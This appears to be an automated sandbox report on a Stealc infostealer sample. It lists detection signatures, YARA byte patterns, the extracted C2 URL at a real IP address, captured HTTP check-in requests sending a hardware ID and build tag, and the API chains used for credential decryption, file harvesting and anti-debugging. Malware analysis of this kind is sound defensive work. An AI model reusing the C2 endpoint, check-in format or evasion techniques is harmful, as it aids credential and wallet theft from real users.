Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
cdc57Mn7dE.exe

Overview

General Information

Sample name:cdc57Mn7dE.exe
renamed because original name is a hash value
Original sample name:07f591a17c73af012377a73b06a11b66.exe
Analysis ID:1542567
MD5:07f591a17c73af012377a73b06a11b66
SHA1:c3479c3c66b82a3840fd71b0a7f12722ff0e1409
SHA256:2fdf8af0479059cbd78914ef60be72d7c4527ceb3e893304d350a8b6dc9bd9bc
Tags:exeStealcuser-abuse_ch
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Machine Learning detection for sample
Searches for specific processes (likely to inject)
AV process strings found (often used to terminate AV products)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • cdc57Mn7dE.exe (PID: 60 cmdline: "C:\Users\user\Desktop\cdc57Mn7dE.exe" MD5: 07F591A17C73AF012377A73B06A11B66)
    • WerFault.exe (PID: 6372 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 60 -s 1180 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://62.204.41.177/edd20096ecef326d.php", "Botnet": "default9_cap"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1585344301.000000000083B000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0xba8:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    00000000.00000002.1585368531.0000000000865000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000003.1268758172.0000000000B90000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
          • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
          Click to see the 3 entries
          SourceRuleDescriptionAuthorStrings
          0.2.cdc57Mn7dE.exe.400000.0.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
            0.2.cdc57Mn7dE.exe.b20e67.2.unpackJoeSecurity_StealcYara detected StealcJoe Security
              0.3.cdc57Mn7dE.exe.b90000.1.unpackJoeSecurity_StealcYara detected StealcJoe Security
                0.2.cdc57Mn7dE.exe.b20e67.2.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                  0.3.cdc57Mn7dE.exe.b90000.1.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                    Click to see the 1 entries
                    No Sigma rule has matched
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-26T00:58:52.463066+020020442431Malware Command and Control Activity Detected192.168.2.74969962.204.41.17780TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: 00000000.00000003.1268758172.0000000000B90000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://62.204.41.177/edd20096ecef326d.php", "Botnet": "default9_cap"}
                    Source: cdc57Mn7dE.exeReversingLabs: Detection: 42%
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: cdc57Mn7dE.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_0040C820 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,lstrcatA,0_2_0040C820
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_00407240 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00407240
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_00409AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00409AC0
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_00418EA0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,0_2_00418EA0
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_00409B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,0_2_00409B60
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_00B274A7 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00B274A7
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_00B29DC7 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,0_2_00B29DC7
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_00B29D27 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00B29D27
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_00B39107 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00B39107
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_00B2CA87 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat,0_2_00B2CA87

                    Compliance

                    barindex
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeUnpacked PE file: 0.2.cdc57Mn7dE.exe.400000.0.unpack
                    Source: cdc57Mn7dE.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040E430
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_004138B0
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_00414570
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00414910
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040ED20
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0040BE70
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040DE10
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004016D0
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0040DA80
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_00413EA0
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040F6B0
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_00B2DCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00B2DCE7
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_00B2C0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00B2C0D7
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_00B2E077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00B2E077
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_00B21937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00B21937
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_00B2F917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00B2F917
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_00B34107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00B34107
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_00B2E697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00B2E697
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_00B2EF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00B2EF87
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_00B347D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00B347D7
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_00B33B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00B33B17
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_00B34B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00B34B77

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49699 -> 62.204.41.177:80
                    Source: Malware configuration extractorURLs: http://62.204.41.177/edd20096ecef326d.php
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.177Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKEBFCFIJJKKECAKJEHDHost: 62.204.41.177Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 45 42 46 43 46 49 4a 4a 4b 4b 45 43 41 4b 4a 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 41 36 30 38 45 46 41 44 44 36 44 33 33 39 32 32 35 39 37 34 39 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 42 46 43 46 49 4a 4a 4b 4b 45 43 41 4b 4a 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 39 5f 63 61 70 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 42 46 43 46 49 4a 4a 4b 4b 45 43 41 4b 4a 45 48 44 2d 2d 0d 0a Data Ascii: ------AKEBFCFIJJKKECAKJEHDContent-Disposition: form-data; name="hwid"AA608EFADD6D3392259749------AKEBFCFIJJKKECAKJEHDContent-Disposition: form-data; name="build"default9_cap------AKEBFCFIJJKKECAKJEHD--
                    Source: Joe Sandbox ViewIP Address: 62.204.41.177 62.204.41.177
                    Source: Joe Sandbox ViewASN Name: TNNET-ASTNNetOyMainnetworkFI TNNET-ASTNNetOyMainnetworkFI
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.177
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.177
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.177
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.177
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.177
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.177
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.177
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.177
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_00404880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlenA,lstrlenA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00404880
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.177Connection: Keep-AliveCache-Control: no-cache
                    Source: unknownHTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKEBFCFIJJKKECAKJEHDHost: 62.204.41.177Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 45 42 46 43 46 49 4a 4a 4b 4b 45 43 41 4b 4a 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 41 36 30 38 45 46 41 44 44 36 44 33 33 39 32 32 35 39 37 34 39 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 42 46 43 46 49 4a 4a 4b 4b 45 43 41 4b 4a 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 39 5f 63 61 70 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 42 46 43 46 49 4a 4a 4b 4b 45 43 41 4b 4a 45 48 44 2d 2d 0d 0a Data Ascii: ------AKEBFCFIJJKKECAKJEHDContent-Disposition: form-data; name="hwid"AA608EFADD6D3392259749------AKEBFCFIJJKKECAKJEHDContent-Disposition: form-data; name="build"default9_cap------AKEBFCFIJJKKECAKJEHD--
                    Source: cdc57Mn7dE.exe, 00000000.00000002.1585294309.000000000082E000.00000004.00000020.00020000.00000000.sdmp, cdc57Mn7dE.exe, 00000000.00000002.1585368531.0000000000865000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177
                    Source: cdc57Mn7dE.exe, 00000000.00000002.1585368531.00000000008AE000.00000004.00000020.00020000.00000000.sdmp, cdc57Mn7dE.exe, 00000000.00000002.1585368531.000000000089E000.00000004.00000020.00020000.00000000.sdmp, cdc57Mn7dE.exe, 00000000.00000002.1585368531.0000000000865000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/
                    Source: cdc57Mn7dE.exe, 00000000.00000002.1585368531.000000000089E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/9
                    Source: cdc57Mn7dE.exe, 00000000.00000002.1585368531.0000000000865000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/F
                    Source: cdc57Mn7dE.exe, 00000000.00000002.1585368531.00000000008BA000.00000004.00000020.00020000.00000000.sdmp, cdc57Mn7dE.exe, 00000000.00000002.1585368531.00000000008AE000.00000004.00000020.00020000.00000000.sdmp, cdc57Mn7dE.exe, 00000000.00000002.1585368531.000000000089E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.php
                    Source: cdc57Mn7dE.exe, 00000000.00000002.1585368531.00000000008BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.php4
                    Source: cdc57Mn7dE.exe, 00000000.00000002.1585368531.000000000089E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.phpTQ
                    Source: cdc57Mn7dE.exe, 00000000.00000002.1585368531.000000000089E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.phpU
                    Source: cdc57Mn7dE.exe, 00000000.00000002.1585368531.00000000008BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.phpt
                    Source: cdc57Mn7dE.exe, 00000000.00000002.1585368531.00000000008BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.phpu
                    Source: cdc57Mn7dE.exe, 00000000.00000002.1585368531.000000000089E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/n
                    Source: cdc57Mn7dE.exe, 00000000.00000002.1585368531.000000000089E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/ows
                    Source: cdc57Mn7dE.exe, 00000000.00000002.1585294309.000000000082E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177E
                    Source: cdc57Mn7dE.exe, 00000000.00000002.1585368531.0000000000865000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177v
                    Source: Amcache.hve.15.drString found in binary or memory: http://upx.sf.net

                    System Summary

                    barindex
                    Source: 00000000.00000002.1585344301.000000000083B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: String function: 004045C0 appears 317 times
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 60 -s 1180
                    Source: cdc57Mn7dE.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 00000000.00000002.1585344301.000000000083B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: cdc57Mn7dE.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: classification engineClassification label: mal100.troj.evad.winEXE@2/5@0/1
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00419600
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_00413720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00413720
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\S1E7GZVV.htmJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess60
                    Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\c16d6fbb-af75-4859-b5a7-cefdb8ba77e5Jump to behavior
                    Source: cdc57Mn7dE.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: cdc57Mn7dE.exeReversingLabs: Detection: 42%
                    Source: unknownProcess created: C:\Users\user\Desktop\cdc57Mn7dE.exe "C:\Users\user\Desktop\cdc57Mn7dE.exe"
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 60 -s 1180
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeSection loaded: msimg32.dllJump to behavior
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

                    Data Obfuscation

                    barindex
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeUnpacked PE file: 0.2.cdc57Mn7dE.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeUnpacked PE file: 0.2.cdc57Mn7dE.exe.400000.0.unpack
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419860
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_0041B035 push ecx; ret 0_2_0041B048
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_0040020D pushfd ; iretd 0_2_00400211
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_008401B3 push eax; ret 0_2_008401D1
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_008401C2 push eax; ret 0_2_008401D1
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_0083D1E3 push 7DD07DC0h; iretd 0_2_0083D1F4
                    Source: C:\Users\user\Desktop\cdc57Mn7dE.exeCode function: 0_2_0083C6DD pushfd ; iretd 0_2_0083C6E0
